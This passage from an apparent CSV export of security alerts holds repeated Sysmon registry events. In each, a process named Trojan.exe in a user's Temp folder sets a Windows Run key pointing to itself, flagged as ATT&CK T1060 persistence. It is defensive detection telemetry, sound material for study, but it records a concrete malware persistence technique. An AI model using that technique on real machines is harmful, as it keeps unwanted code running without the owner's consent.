HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:24.029"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:36.486",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:23.013 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:23.179641800Z"",""eventRecordID"":""1300"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:23.013\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:23.013"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:35.327",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:21.997 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:22.002470700Z"",""eventRecordID"":""1299"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:21.997\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:21.997"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:34.123",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:20.967 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:20.988742500Z"",""eventRecordID"":""1298"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:20.967\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:20.967"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:33.158",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:19.945 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:19.978050900Z"",""eventRecordID"":""1297"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:19.945\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:19.945"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:32.513",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:18.872 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:18.897340100Z"",""eventRecordID"":""1296"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:18.872\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:18.872"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:31.074",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:17.841 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:17.846950700Z"",""eventRecordID"":""1295"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:17.841\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:17.841"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:29.094",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:16.825 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:16.852439300Z"",""eventRecordID"":""1294"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:16.825\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:16.825"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:29.042",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:15.810 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:15.898078100Z"",""eventRecordID"":""1293"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:15.810\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:15.810"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:28.294",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:14.756 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:14.762972900Z"",""eventRecordID"":""1292"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:14.756\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:14.756"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:28.223",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:13.718 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:13.725413300Z"",""eventRecordID"":""1291"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:13.718\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:13.718"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:25.797",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:12.684 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:12.691453400Z"",""eventRecordID"":""1290"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:12.684\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 